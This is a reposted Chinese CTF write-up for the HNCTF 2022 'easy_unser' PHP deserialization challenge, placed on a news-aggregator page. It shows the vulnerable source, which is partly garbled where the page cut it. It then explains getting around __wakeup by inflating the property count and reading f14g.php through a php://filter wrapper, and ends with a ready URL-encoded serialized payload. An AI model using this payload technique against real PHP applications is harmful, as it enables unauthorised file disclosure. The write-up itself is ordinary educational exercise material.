最新要闻

广告

手机

iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?

iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?

警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案

警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案

家电

天天日报丨[HNCTF 2022 WEEK2]

来源:博客园


(资料图)

easy_unser

want = $want;        else $this->want = $this->todonothing;    }    function __wakeup(){        $About_me = "When the object is unserialized,I will be called";        $but = "I can CHANGE you";        $this-> want = $but;        echo "C1ybaby!";            }    function __destruct(){        $About_me = "I"m the final function,when the object is destroyed,I will be called";        echo "So,let me see if you can get what you want\n";        if($this->todonothing === $this->want)            die("鲍勃,别傻愣着!\n");        if($this->want == "I can CHANGE you")            die("You are not you....");        if($this->want == "f14g.php" OR is_file($this->want)){            die("You want my heart?No way!\n");        }else{            echo "You got it!";            highlight_file($this->want);            }    }}    class unserializeorder{        public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!
"; function __sleep(){ $About_me = "When the object is serialized,I will be called"; echo "We Come To HNCTF,Enjoy the ser14l1zti0n
"; } function __toString(){ $About_me = "When the object is used as a string,I will be called"; return $this->CORE; } } $obj = new unserializeorder(); echo $obj; $obj = serialize($obj); if (isset($_GET["ywant"])) { $ywant = @unserialize(@$_GET["ywant"]); echo $ywant; }?>人类最大的敌人,就是无序. Yahi param vaastavikta hai!We Come To HNCTF,Enjoy the ser14l1zti0n

首先看代码可知,flag在f14g.php中,所以我们只要找到能够利用的点就可以了。

往上看可以看到body类中highlight_file()可以进行利用,所以说我们需要让want为我们想要的f14g.php就可以了。

function __destruct(){        $About_me = "I"m the final function,when the object is destroyed,I will be called";        echo "So,let me see if you can get what you want\n";        if($this->todonothing === $this->want)            die("鲍勃,别傻愣着!\n");        if($this->want == "I can CHANGE you")            die("You are not you....");        if($this->want == "f14g.php" OR is_file($this->want)){            die("You want my heart?No way!\n");        }else{            echo "You got it!";            highlight_file($this->want);            }    } 

但是这边过滤的有点严,若是want=f14g.php,或者说是is_file()中的文件存在的话就会返回"So,let me see if you can get what you want\n";

所以我们不能直接让want=f14g.php,这里可以用php://filter伪协议来回显f14g.php文件。

构造如下:

";    }$a=new body();echo urlencode(serialize($a));?>

payload:?ywant=O%3A4%3A"body"%3A2%3A{s%3A10%3A"%00body%00want"%3Bs%3A30%3A"php%3A%2F%2Ffilter%2Fresource%3Df14g.php"%3B}

这里注意还需要绕过__wakeup魔术方法,所以%3A %3A中间原本为1,现在为2。

关键词: